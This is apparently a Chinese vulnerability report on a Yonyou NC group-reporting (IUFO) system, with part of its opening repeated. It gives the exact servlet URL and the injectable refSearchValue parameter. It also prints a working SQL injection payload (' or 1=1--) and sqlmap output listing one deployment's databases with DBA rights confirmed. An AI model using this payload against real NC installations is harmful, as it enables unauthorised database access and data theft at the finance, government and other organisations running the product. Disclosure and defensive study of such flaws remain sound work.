### 简要描述: 用友NC-集团报表为集团企业用户提供全面的报表解决方案,它主要支持各类业务报表的输出、合并报表编制、分部报告编制以及报表的权限与流程管理,客户涉及金融、政府、教育、企业等 ------------------------------------------------ 该SQL注入点简单粗暴!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ### 详细说明: 用友IUFO如图: [<img src="https://images.seebug.org/upload/201405/1610394610277376dfe2623186237c5acf93c4dd.png" alt="57C6AEC8-DD03-415B-A79F-59803204976C.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1610394610277376dfe2623186237c5acf93c4dd.png) 问题出在单位编码这,点击放大镜查找的时候一直是这页面,还以为没这功能呢,后来才发现可以直接访问URL进入搜索页面; [<img src="https://images.seebug.org/upload/201405/16164752f7cf9be949760e9655b1f762386de62f.png" alt="aaa111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16164752f7cf9be949760e9655b1f762386de62f.png) 随便找个: ```...
### 简要描述: 用友NC-集团报表为集团企业用户提供全面的报表解决方案,它主要支持各类业务报表的输出、合并报表编制、分部报告编制以及报表的权限与流程管理,客户涉及金融、政府、教育、企业等 ------------------------------------------------ 该SQL注入点简单粗暴!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ### 详细说明: 用友IUFO如图: [<img src="https://images.seebug.org/upload/201405/1610394610277376dfe2623186237c5acf93c4dd.png" alt="57C6AEC8-DD03-415B-A79F-59803204976C.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1610394610277376dfe2623186237c5acf93c4dd.png) 问题出在单位编码这,点击放大镜查找的时候一直是这页面,还以为没这功能呢,后来才发现可以直接访问URL进入搜索页面; [<img src="https://images.seebug.org/upload/201405/16164752f7cf9be949760e9655b1f762386de62f.png" alt="aaa111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16164752f7cf9be949760e9655b1f762386de62f.png) 随便找个: ``` http://localhost/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute ``` 经典测试: ‘or 1=1 ’or 1=2返回结果不一样 [<img src="https://images.seebug.org/upload/201405/161648265fcd8ebba8451f30c50c54c060d92486.png" alt="123.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/161648265fcd8ebba8451f30c50c54c060d92486.png) 抓取HTTP请求包,refSearchValue参数存在SQL注入漏洞 ``` TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=' or 1=1-- ``` ------------------------------------ 使用SQLMAP available databases [15]: [*] BAIC [*] BAIC2 [*] BAIC20121120 [*] BAIC3 [*] DBSNMP [*] EXFSYS [*] MDSYS [*] ORDSYS [*] OUTLN [*] SYS [*] SYSMAN [*] SYSTEM [*] TSMSYS [*] WMSYS [*] XDB ### 漏洞证明: DBA权限: current user is DBA: True available databases [15]: [*] BAIC [*] BAIC2 [*] BAIC20121120 [*] BAIC3 [*] DBSNMP [*] EXFSYS [*] MDSYS [*] ORDSYS [*] OUTLN [*] SYS [*] SYSMAN [*] SYSTEM [*] TSMSYS [*] WMSYS [*] XDB 来看看影响力: ---------------------------------------- [<img src="https://images.seebug.org/upload/201405/161105159b9c688bbd671db821582ceb826c3a39.png" alt="jd.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/161105159b9c688bbd671db821582ceb826c3a39.png)
